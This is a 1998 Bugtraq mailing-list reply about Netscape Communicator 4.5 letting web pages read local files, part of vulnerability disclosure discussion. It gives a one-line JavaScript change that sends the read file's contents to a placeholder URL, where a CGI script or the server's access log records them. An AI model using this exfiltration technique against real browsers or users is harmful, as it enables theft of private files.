[8632] in bugtraq
Re: Netscape Communicator 4.5 can read local files
daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Wed Nov 25 14:36:58 1998
Date: Wed, 25 Nov 1998 20:13:13 +0100
Reply-To: peak@kerberos.troja.mff.cuni.cz
From: Pavel Kankovsky <peak@KERBEROS.TROJA.MFF.CUNI.CZ>
X-To: Ben Collins <bmc@VISI.NET>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19981125124832.D3883@visi.net>
On Wed, 25 Nov 1998, Ben Collins wrote:
> If some one here can setup a webpage, send me the URL, have that page read
> the file '/test.txt' from my hardrive and then that person send the
> contents to this list, I will believe. Otherwise I think this whole
> hysteria over 'unforseen' dangers should stop.
replace alert(b) with
w=window.open(\"some_url?\"+escape(b));
and make sure some_url points to a cgi script recording its $QUERY_STRING
(in fact, the text would be recorded in access_log as well)
BTW: it seems both Java and JavaScripts must be enabled
--Pavel Kankovsky aka Peak [ Boycott Czech Telecom--http://www.bojkot.cz ]
"spt Telecom... ted zdrazujeme zitrek!" [ Engl. lang. info-- .../english/ ]
